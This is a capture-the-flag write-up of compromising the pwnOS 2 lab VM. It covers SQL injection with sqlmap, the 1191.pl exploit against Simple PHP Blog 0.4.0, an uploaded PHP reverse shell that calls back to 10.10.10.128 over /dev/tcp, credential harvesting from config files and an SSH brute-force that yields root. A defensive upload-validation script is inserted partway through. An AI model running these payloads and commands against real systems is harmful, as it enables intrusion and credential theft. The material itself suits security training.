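For this target VM you need to configure the attack machine yourself so that it sits on the 10.10.10.0/24 network.
SQL injection
The login form on port 80 turns out to be injectable. sqlmap can dump a lot of data, but none of it seems to work for logging in, and --os-shell returns no output either.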
sqlmap -u http://10.10.10.100/login.php --data="email=1&pass=1&submit=Login&submitted=TRUE" -D ch16 -T users --dump -C email
+------------------+
| email            |
+------------------+
| admin@admin.com  |
| admin@isints.com |
+------------------+

+------------------------------------------+
| pass                                     |
+------------------------------------------+
| a6f6077d3947da34b11414ffeb86d8828ef9b005 |
| c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |
+------------------------------------------+
123abc_
killerbeesareflying
Directory scan
The dirb scan shows that a blog service is hosted on the server.
dirb http://10.10.10.100
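On the index page, logging in with the credentials dumped earlier also appears to fail.
The page source shows that it is Simple PHP Blog 0.4.0. You really have to look carefully to spot this; for fingerprinting, it pays to check the file headers, or to search the whole source for the word "by".
Exploitation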
searchsploit Simple PHP Blog 0.4.0
Use 1191.pl, whose version number matches exactly; the Metasploit one listed after it works as well.
searchsploit -m 1191.pl
A Perl dependency has to be installed first, otherwise the script will not run.
sudo apt install libswitch-perl
First try dumping its password; what comes back is the same thing that is leaked in the config directory found during the directory brute-force.
perl 1191.pl -h http://10.10.10.100/blog -e 2
So just change the password directly.
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U ha -P ha
Enter the blog admin panel
There is an image upload feature, and it performs no file type validation.
Upload a reverse shell directly
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>
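The path to trigger it is the image directory that dirb found earlier; clicking the file triggers it.
Start a listener on local port 1234, and the shell comes back.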
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 32903
bash: no job control in this shell
www-data@web:/var/www/blog/images$ ls
ls
back.php
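A server-side check that would have rejected the back.php upload shown above, together with an audit of an existing upload directory. This is an added example, not part of the original writeup or of Simple PHP Blog; the allowlist, the function names and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Allowlisted image extensions and the magic bytes each file must start with (assumed policy).
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = b"<?php"  # short tags are left out to avoid false hits in binary image data

def check_upload(name, data):
    """Return the reasons a file should be rejected (empty list means accept)."""
    reasons = []
    ext = os.path.splitext(name)[1].lower()
    if ext not in MAGIC:
        reasons.append(f"extension {ext or '(none)'} not in allowlist")
    elif not data.startswith(MAGIC[ext]):
        reasons.append("content does not match extension")
    # Names like shell.php.jpg can still be executed on misconfigured servers.
    if any(p.lower() in ("php", "phtml", "phar") for p in name.split(".")[1:-1]):
        reasons.append("executable extension hidden before the final one")
    if PHP_TAG in data.lower():
        reasons.append("embedded PHP open tag")
    return reasons

def audit_directory(path):
    """Scan an existing upload directory and report every file that fails the checks."""
    findings = {}
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if os.path.isfile(full):
            with open(full, "rb") as fh:
                reasons = check_upload(entry, fh.read())
            if reasons:
                findings[entry] = reasons
    return findings

if __name__ == "__main__":
    # Constructed sample directory standing in for an images/ upload folder.
    with tempfile.TemporaryDirectory() as d:
        samples = {"logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
                   "back.php": b"<?php /* constructed placeholder */ ?>",
                   "photo.gif": b"GIF89a<?php /* constructed placeholder */ ?>"}
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        for name, reasons in audit_directory(d).items():
            print(name, "->", "; ".join(reasons))
```

Content checks are only one layer; the upload directory should also be served with PHP execution disabled.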
Spawn a more interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
Privilege escalation
sudo -l
It asks for a password, so the only option is to look around for information.
cat /etc/passwd |grep "/bin/bash"
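There are three users: root, mysql and dan.
Speaking of mysql, the next step is to check the files under the PHP web directory for a database connection password.
One was found in /var/www, but goodday turned out to be the wrong password.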
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
But another one was found under /var
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
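The login did succeed, but what it turns up is the same as what sqlmap found earlier, so the next thought was how to make use of the MySQL root user.
[Sneaky trick] Using the MySQL root account to quickly GetShell - Zhihu (zhihu.com)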
https://blog.51cto.com/297020555/544763#
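Neither of the two articles above worked; it feels like this is because the MySQL service is only reachable from localhost by default.
So it is time to try my luck.
Build two lists from the information known so far.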
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos2]
└─# cat user
root
admin
isints
dan
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos2]
└─# cat pass
isints
123abc_
killerbeesareflying
root@ISIntS
goodday
Try a brute-force with a tool
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos]
└─# crackmapexec ssh 10.10.10.100 -u user -p pass --continue-on-success | grep "+"
SSH 10.10.10.100 22 10.10.10.100 [+] root:root@ISIntS (Pwn3d!)
SSH connection
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos]
└─# ssh root@10.10.10.100
root@10.10.10.100's password:
Permission denied, please try again.
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Wed Jul 17 12:30:47 EDT 2024

  System load:  0.0               Processes:           82
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 23%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# ls
root@web:~# sudo -l
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL
Privilege escalation succeeded